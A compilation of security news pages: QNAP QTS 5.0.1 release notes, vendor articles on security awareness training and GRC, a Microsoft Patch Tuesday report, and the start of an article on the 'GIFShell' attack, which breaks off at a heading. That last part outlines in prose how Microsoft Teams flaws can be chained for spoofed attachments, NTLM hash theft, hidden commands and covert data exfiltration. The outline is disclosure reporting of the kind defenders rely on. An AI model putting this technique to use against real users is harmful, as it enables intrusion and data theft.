Qnap QTS 5.0.1.2145 build 20220903

2022-09-15

Applicable Models

HS-251+,S2
QMiroPlus-201W
Mustang-F100,Mustang-V100,Mustang-200-i7-1T-32G-R10,Mustang-200-i5-1T-32G-R10,Mustang-200-C-8G-R10,Mustang-200
QBoat Sunny
QGD-1600P
QGD-1602P
QGD-3014-16PT
TS-453S Pro,TS-853S Pro
TS-531P
TS-216,TS-416
TS-128A,TS-228A,TS-212P3,TS-130,D1 Rev-B
TS-231P3,TS-431P3
TS-231P2,TS-431P2
TS-831X,TS-531X,TS-431X,TS-431X2,TS-431X3,TS-431KX
TS-431XU,TS-831XU,TS-1231XU,TS-431XU-RP,TS-831XU-RP,TS-1231XU-RP,TS-431XeU
TS-932X,TS-832X,TS-332X,TS-532X,TS-932PX,TS-832PX
TS-432XU-RP,TS-432XU,TS-832XU-RP,TS-832XU,TS-1232XU-RP,TS-1232XU,TS-432PXU,TS-432PXU-RP,TS-832PXU,TS-832PXU-RP,TS-1232PXU,TS-1232PXU-RP
TS-133,TS-233,TS-433
TS-1635
TS-1635AX
TS-435XeU
TS-231+,TS-431+,TS-131P,TS-231P,TS-431P,TS-131K,TS-231K,TS-431K,D2,D4,D4 Rev-B
TS-251,TS-451,TS-651,TS-851,TS-451S,TS-251+,TS-451+,TS-351,D2 Pro Rev-B,D4 Pro Rev-B
TS-251A,TS-451A,D2 Pro,D4 Pro
TS-251B
TS-451DeU,TS-453DU,TS-453DU-RP,TS-853DU-RP,TS-1253DU-RP
TS-451U
TS-253 Pro,TS-453 Pro,TS-653 Pro,TS-853 Pro,TS-453mini,IS-453S
TS-453Bmini,TS-253B,TS-453B,TS-653B,TS-253Be,TS-453Be,TS-453BT3
TS-853BU,TS-853BU-RP,TS-1253BU,TS-1253BU-RP,TS-453BU,TS-453BU-RP
HS-453DX,TBS-453DX,TS-251D,TS-253D,TS-653D,TS-453D,TS-451D,TS-453Dmini,TS-451D2
TBS-453A,TS-253A,TS-453A,TS-653A,TS-853A,D6 Pro,D8 Pro
TS-453U,TS-853U,TS-1253U,TS-453U-RP,TS-853U-RP,TS-1253U-RP,R4
TVS-463,TVS-663,TVS-863,TVS-863+,TS-563,TS-963X,TS-963N
TS-463U,TS-463U-RP,TS-863U,TS-863U-RP,TS-1263U,TS-1263U-RP,TS-463XU,TS-463XU-RP,TS-863XU,TS-863XU-RP,TS-1263XU,TS-1263XU-RP
TS-564,HS-264,TBS-464,TS-262C,TS-462C,TS-264C,TS-464C,TS-364,TS-464,TS-664
TS-464U,TS-464U-RP,TS-1264U-RP,TS-464eU,TS-864eU,TS-864eU-RP
TVS-471,TVS-671,TVS-871,TVS-871T
TVS-871U-RP,TVS-1271U-RP,TVS-471U-RP,TVS-471U,R8
TVS-672N,TVS-872N,TVS-872X,TVS-672X,TVS-472X,TVS-472XT,TVS-672XT,TVS-872XT
TVS-872XU,TVS-872XU-RP,TVS-1272XU-RP,TVS-1672XU-RP,TVS-2472XU-RP,TVS-972XU,TVS-972XU-RP
TVS-473,TVS-673,TVS-873,TVS-473e,TVS-673e,TVS-873e
TS-h973AX,TS-473A,TS-673A,TS-873A
TS-873AU,TS-873AU-RP,TS-1273AU-RP,TS-1673AU-RP,TS-873AeU,TS-873AeU-RP
TS-873U,TS-1273U,TS-1673U,TS-873U-RP,TS-1273U-RP,TS-1673U-RP
TVS-675
TVS-h875U,TVS-h875U-RP,TVS-h1275U-RP,TVS-h1675U-RP
TS-1277,TS-877,TS-677,TS-1677X
TS-877XU,TS-877XU-RP,TS-1277XU-RP,TS-1677XU-RP,TS-2477XU-RP,TS-977XU-RP,TS-977XU,TS-h1277XU-RP,TS-h977XU-RP,TS-h1677XU-RP,TS-h2477XU-RP
TS-EC880 Pro,TS-EC1080 Pro,TVS-EC880,TVS-EC1080,TVS-EC1080+
TS-EC880U,TS-EC1280U,TS-EC1680U,TS-EC2480U R2,TVS-EC1280U-SAS-RP R2,TVS-EC1580MU-SAS-RP R2,TVS-EC1680U-SAS-RP R2,TVS-EC2480U-SAS-RP R2,TS-EC2480U,TS-EC880U R2,TS-EC1280U R2,TS-EC1680U R2,TVS-EC1280U-SAS-RP,TVS-EC1580MU-SAS-RP,TVS-EC1680U-SAS-RP,TVS-EC2480U-SAS-RP,R12,R16,R24
TVS-682,TVS-882,TVS-1282,TVS-882BR,TVS-882T,TVS-1282T,TVS-682T,TVS-1282T3,TVS-882BRT3
TVS-1582TU
TS-883XU,TS-883XU-RP,TS-1283XU-RP,TS-1683XU-RP,TS-983XU,TS-983XU-RP,TS-2483XU-RP,TS-h1283XU-RP,TS-h2483XU-RP,TS-h1683XU-RP
TS-1685,TS-h886,TS-h686
TES-3085U,TES-1885U,TS-1886XU-RP,TS-h1886XU-RP,TS-h1886XU-RP R2
TS-2888X,TVS-h1688X,TVS-h1288X
TS-h3088XU-RP
TDS-16489U
TS-h2490FU,TS-h1090FU
TS-328,TS-428,TS-230,D2 Rev-B
TS-551
TS-473,TS-673,TS-873
TVS-951X,TVS-951N
GM-1000,TNS-h1083X,TNS-h1083X (A Side),TNS-h1083X (B Side)
TS-i410X, TS-410E
TS-253E,TS-453E
TS-h1290FX
TVS-882ST,TVS-882ST3
TS-h987XU-RP,TS-h1887XU-RP,TS-h2287XU-RP,TS-h3087XU-RP
TVS-h474,TVS-h674,TVS-h874

Show less

Important Notes

Out-of-the-box QTS 5.0.1 automatically installs security updates by default. Nevertheless, if you update the firmware from QTS 5.0.0 to 5.0.1, QTS will keep your existing firmware update settings. We recommend checking your firmware update settings in Control Panel > Firmware Update.
Removed support for the following developer tools: Node.js v4, Node.js v6, Node.js v8, and Ruby on Rails.
Removed support for the following apps or tools: Mono, Perl, and AlarmClock. We recommend running these apps or tools using Container Station if needed.
When a release candidate has proven to be stable enough for public use, we name this release candidate as an official release. You will not be notified again for official firmware update if you have already updated your system to this release candidate.

New Features

Control Panel

QTS now supports access protection settings for RTRR and Rsync protocols in Control Panel > System > Security.
Administrators can now enforce 2-step verification on specific users or groups and then check their current verification status. After this enforcement, selected users must complete 2-step verification setup before proceeding to other operations.
To ensure device security, you can now choose to disable USB ports to block all USB devices or only USB storage devices.

Desktop & Login

You can now configure the desktop icon size and font size in Desktop > Task Bar > Options >Wallpaper.

File Station

You can now share a shared folder via a share link.

Network & Virtual Switch

Network & Virtual Switch now displays MTU (Maximum Transmission Unit) values for network interfaces.

SAMBA

QTS now supports Microsoft Windows Search Protocol. This allows you to perform quick searches for files and folders in NAS shared folders mounted on Windows 10 via SMB.

Storage&Snapshots

Storage & Snapshots now displays topology diagrams for SAS JBOD expansion enclosures to help visualize the arrangement of your storage devices.
To ensure the availability of your data, Storage & Snapshots now supports “Replace & Detach”, which allows you to copy data from a faulty disk to a spare disk and then safely detach the faulty disk.
You can now use exFAT on ARM-based models without purchasing an exFAT license. Note that we have already added this support for x86-based models in an earlier update.
Added support for TCG-Enterprise SEDs. Storage & Snapshots can now display SED types.
Snapshot Replica now supports 2-step verification.
You can now specify a snapshot deletion policy in Storage & Snapshots > Global Settings.

Enhancement

Control Panel

Added an option to force users to change their password upon their first login.
Added the following features in Control Panel to optimize the mechanism and workflow of firmware updates:
- Merged live update settings and auto update settings into a single user interface.
- Enhanced notifications for firmware updates. Users can choose to postpone or cancel updates before the scheduled update time.
- Introduced a new update type: important security updates. We recommend selecting this update type in auto update settings to ensure your device security.
QTS now displays a warning message in Control Panel > System > Hardware > Hardware Resources when you select a graphics card installed on a PCIe slot that does not support PCIe passthrough.
When importing users, you can now choose to require imported users to change their password upon their first login.
Shortened the waiting period for auto firmware updates. QTS now starts an auto update within only one hour from the scheduled time if a new firmware version is available for your device.
Administrators can now choose to receive notifications upon login if a recommended firmware update is available. (This feature is enabled by default).
The default UPS policy is now set to “auto-protection mode” after NAS initialization.
You can now create a one-time power schedule.
QTS now provides an option in Control Panel to disable the power button. This prevents unexpected shutdown when users press the power button by accident.
To prevent malicious usernames and to ensure device security, QTS no longer allows usernames that contain the following characters: { } $ and the space character.

File Station

File Station can now convert Apple iWork files to Microsoft Office formats with CloudConvert API v2.
Optimized the results of file name sorting for all languages. This helps deliver more consistent sorting results.
File Station now provides more information for background tasks to help you understand the detail, status, and progress of each task.
Share links now display file thumbnails and allow you to select and download multiple files at the same time. We have also enhanced the UI design to improve your file sharing experience.

Network & Virtual Switch

Upgraded jQuery to 3.5.1.
Improved the information for the system default gateway and NCSI (Network Connectivity Status Indicator) in Network & Virtual Switch to better explain their behaviors.
The TS-x77XU and TS-x83XU models can now update firmware for their network interface cards via Advanced Network Driver.

PHP System Module

Upgraded the built-in PHP version to 7.4.20.

SAMABA

Users can now enable SMB signing for NAS devices that do not join a domain. To enable this setting, go to Control Panel > Network & File Services > Win/Mac/NFS/WebDAV > Microsoft Networking > Advanced Options.
To prevent malware and ransomware from exploiting SMB v1 vulnerabilities, QTS now automatically sets the lowest SMB version to SMB v2 if your lowest SMB version is SMB v1 before this firmware update.

Storage&Snapshots

Updated Seagate IronWolf Health Management (IHM) to 2.1.1 to add support for the following drive models: IronWolf 525 SSD 2TB(ZP2000NM30002), IronWolf 525 SSD 1TB(ZP1000NM30002), IronWolf 525 SSD 500GB(ZP500NM30002), IronWolf 16TB(ST16000VN001), IronWolf 14TB(ST14000VN0008), IronWolf Pro 20TB(ST20000NE000), IronWolf 18TB(ST18000VN000), IronWolf 4TB(ST4000VN006).
Storage & Snapshots now supports zooming in on hardware model drawings to display component details.
Improved the user interface of Snapshot Replica to further enhance usability and user experience.
Storage & Snapshots now also displays Snapshot Replica information in Overview > Volume/LUN.

Fixed Issues

Fixed an issue where user storage quota would be reset to the default value after users restarted the NAS.

Known Issues

QTS and QuTS hero with newer kernel versions do not support ATTO Fibre Channel adapters. If you have already installed an ATTO Fibre Channel adapter on your device, we do not recommend updating the firmware to QTS 5.0.1 or QuTS hero h5.0.1 for the time being.
Thunderbolt connection between the NAS and Mac sometimes cannot automatically resume after users restart the NAS.
Users cannot connect to the destination NAS of a Snapshot Replica job if their usernames contain a space.
After waking up from sleep, the TS-x51 and TS-x53 models cannot detect external drives that do not support sleep mode.
Network connection issues may occur when users add both 10 GbE ports of the QXG-10G2SF-CX4 network expansion card to a virtual switch.
Users sometimes cannot switch between different FEC (Forward Error Correction) modes for the QXG-25G2SF-CX6LX network expansion card.
On some earlier NAS models with ARM processors, heavy I/O operations may cause network connection issues for the QNA-UC5G1T USB-to-Ethernet adapter.

Other Changes

App Center

In App Center, the option “Allow installation of applications without a valid digital signature” is now disabled by default after firmware update.

Control Panel

Removed certain device information from the login screen to enhance device security.
To ensure device security, the “admin” account cannot use the default password (the MAC address of the first network adapter) when changing the password.

Desktop & Login

Instead of using the generic alias “appuser”, QuLog Center and Desktop Dashboard now display actual usernames when users access system resources and services via a client app.
To enhance device security, the system now asks the “admin” user to change the password when the user logs in with the default password (the MAC address of the first network adapter).

License

You no longer need a license to operate QuTScloud installed in Virtualization Station. Note that License Center 1.7.5 (or later) is required for this change.

Storage&Snapshots

For a more intuitive workflow, Storage & Snapshots now shows various options (such as “Remove” and “Expand”) on the “Action” menu in Pool/Volume Management.
Storage & Snapshots now provides clearer information for the results of IronWolf Health Management (IHM) tests. This allows you to easily check the health of your IronWolf drives.
You can now quickly identify and repair volumes that may have potential issues after a power outage or an abnormal shutdown. In Storage & Snapshots > Overview, we now add a link that allows you to perform a file system check on such volumes.
VJBOD currently does not support encrypted LUNs.
Adjusted some settings in the Volume Creation Wizard to enhance user experience. Thin volume is now the default volume type for volume creation.

Source :
https://www.qnap.com/it-it/release-notes/qts/5.0.1.2145/20220903?ref=nas_product

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of the U.S. is considering quitting their jobs. This trend – coined the great resignation – creates instability in organizations. High employee turnover increases security risks, and companies are more vulnerable to attacks from human factors worldwide.

At Davos 2022, statistics connect the turmoil of the great resignation to the rise of new insider threats. Security teams are feeling the impact. It’s even harder to keep up with your employee security. Companies need a fresh approach to close the gaps and prevent attacks. This article will examine what your security teams must do within the new organizational dynamics to quickly and effectively address unique challenges.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team—the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behavior, and ways of work. Changing habits is slow. Yet, companies don’t have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization’s security high-impact risks:

Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
Ensure friendly reminders – With less staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
Support remote work –To support rapid employee recruitment, working at home is a must. Remote work flexibility helps to attract and retain new employees.
Train on the go – Remote work requires securing remote devices and dealing with new employee behavior for inherent distractions – on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts within the high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff. It must genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present. All employees are needed to protect against sophisticated phishing threats. It’s even more complicated in the great resignation. With new weak links, your company is at the greatest risk. Gullible employees leave security ‘holes’ in your organization’s front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
Raise employee awareness of threats.
Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren’t enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty. Create a foundation. Continually promote learning to the next level. You must understand and cater to your employee’s needs and way of work for effectiveness.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

Adjust your training simulations to employee contexts and frequency for mastery.
Set difficulty level depending on employee behavior and results.
Use intensive, bite-size intervals for success.
By varying attack scenarios, new employees get proper onboarding.
Put security on the top of the mind of all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

Build custom high-intensity training campaigns for your high-risk groups.
Focus on specific challenges for concrete results like:

1) Password and data requests

2) Messages from seemingly legitimate senders and sources

3) Realistic content tailored to a specific department or role.

Adapt your training for both individuals and attack vectors while respecting employee privacy.
Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the great resignation. It’s more important than ever for every employee to get up to speed for high cyber resilience quickly.

Download the CybeReady Playbook to learn how CybeReady’s fully automated security awareness training platform provides the fast, concrete results you need with virtually zero effort IT, or schedule a product demo with one of our experts.

Source :
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliable the information serves an organization’s specific needs — mainly supporting decision-making.

Some of these needs might be:

Operations – Where and how can we be more efficient?
Resource distribution – Do we have any excess? Where? And why?
Planning – How likely is this scenario to occur? What can we do about it?
Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

Consistency
Accuracy
Validity
Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

Completeness: The expected data to make decisions is present.
Uniqueness: There is no duplication of data.
Timeliness: The data is up-to-date and available to use when needed.
Validity: The information has the proper format and matches the requirements.
Accuracy: The data describes the object correctly in a real-world context.
Consistency: The data must be the same across multiple databases

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls to avoid mistakes, standardize tasks and guide personnel when collecting and dealing with vital information.

GRC helps organizations answer the following questions:

How is the company ensuring that data is available for internal decision and for the clients?
Is everyone taking the proper steps to collect and process data?
Have redundancies been removed?
Is the organization prepared for unexpected events?
Does the organization have a backup system?
Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enable organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization process has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can’t provide any value, and they face the following risks:

Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
Lost revenue: According to 2021 Gartner’s research, the average financial impact of poor data quality on organizations is $12.9 million annually.
Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
Increased expenses: A few years ago, IBM’s research showed that businesses lost 3.1 trillion dollars in the US alone. How? Spending time to find the correct data, fixing errors, and just hunting for information and confirmed sources.
Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
Reputational damage: In today’s world, customers spend a lot of their time reading reviews before making a decision. For instance, if a company fails to satisfy its customers, everyone will know.
Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are not easily identified. Trusting data not just improves efficiency and results; it also helps with fundamental, vital factors that affect business performance and success.

What are these factors?

Fundamental benefits:

Profits/Revenue
Internal communication
Employees confidence to share information
Company’s reputation
Trust

Operational benefits:

Efficiency
Business outcome
Privacy issues
Customer satisfaction
Better audience-targeting

How GRC protect the value of businesses and their data

In this contemporary world, companies should be measured not only via existing financial measurements but also by the amount of monetizable data they can capture, consume, store and use. More importantly, how the data helps the organization’s internal processes to be faster and more agile.

When people think of high-quality data and big data, they usually associate these two with big organizations, especially technology and social media platforms. However, big quality data gives organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

Understand their clients
Enhance business operations
Understand industry best practices
Identify the best partnership options
Strengthen business culture
Deliver better results
Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sale cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal) and, as such, is mandatory for organizations to protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

Fines
Lawsuits
Stolen information
Compensations
Potential business loss

Indirect costs are:

Reputation/Trust
PR activities
Lost revenue from downtime
New and better protection

Often, reputation damages can cause long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is the company’s biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can’t get or maintain customers because of a lack of trust, the organization’s value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium size companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harward Business Review said that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

Human errors
Wrong data handling
Inaccurate formatting
Different sets of data for various departments
Unawareness of risks
Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company’s information. As a result, GRC will empower companies to be able to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allow organizations to understand the risks associated with data handling and guide managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source :
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Microsoft’s Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

“In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months,” Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

“However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total.”

The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

“An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system,” Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It’s not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows –

CVE-2022-34718 (CVSS score: 9.8) – Windows TCP/IP Remote Code Execution Vulnerability
CVE-2022-34721 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
CVE-2022-34722 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
CVE-2022-34700 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
CVE-2022-35805 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

“An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation,” Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server and five privilege escalation bugs spanning Windows Kerberos and Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.

Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

“This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening,” Jogi said. “If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information.”

Software Patches from Other Vendors

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

Adobe
Android
Apache Projects
Apple
Cisco
Citrix
Dell
F5
Fortinet
GitLab
Google Chrome
HP
IBM
Lenovo
Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
MediaTek
NVIDIA
Qualcomm
Samba
SAP
Schneider Electric
Siemens
Trend Micro
VMware, and
WordPress (which is dropping support for versions 3.7 through 4.0 starting December 1, 2022)

Source :
https://thehackernews.com/2022/09/microsofts-latest-security-update-fixes.html

GIFShell attack creates reverse shell using Microsoft Teams GIFs

A new attack technique called ‘GIFShell’ allows threat actors to abuse Microsoft Teams for novel phishing attacks and covertly executing commands to steal data using … GIFs.

The new attack scenario, shared exclusively with BleepingComputer, illustrates how attackers can string together numerous Microsoft Teams vulnerabilities and flaws to abuse legitimate Microsoft infrastructure to deliver malicious files, commands, and perform exfiltrating data via GIFs.

As the data exfiltration is done through Microsoft’s own servers, the traffic will be harder to detect by security software that sees it as legitimate Microsoft Team’s traffic.

Overall, the attack technique utilizes a variety of Microsoft Teams flaws and vulnerabilities:

Bypassing Microsoft Teams security controls allows external users to send attachments to Microsoft Teams users.
Modify sent attachments to have users download files from an external URL rather than the generated SharePoint link.
Spoof Microsoft teams attachments to appear as harmless files but download a malicious executable or document.
Insecure URI schemes to allow SMB NTLM hash theft or NTLM Relay attacks.
Microsoft supports sending HTML base64 encoded GIFs, but does not scan the byte content of those GIFs. This allows malicious commands to be delivered within a normal-looking GIF.
Microsoft stores Teams messages in a parsable log file, located locally on the victim’s machine, and accessible by a low-privileged user.
Microsoft servers retrieve GIFs from remote servers, allowing data exfiltration via GIF filenames.

GIFShell – a reverse shell via GIFs

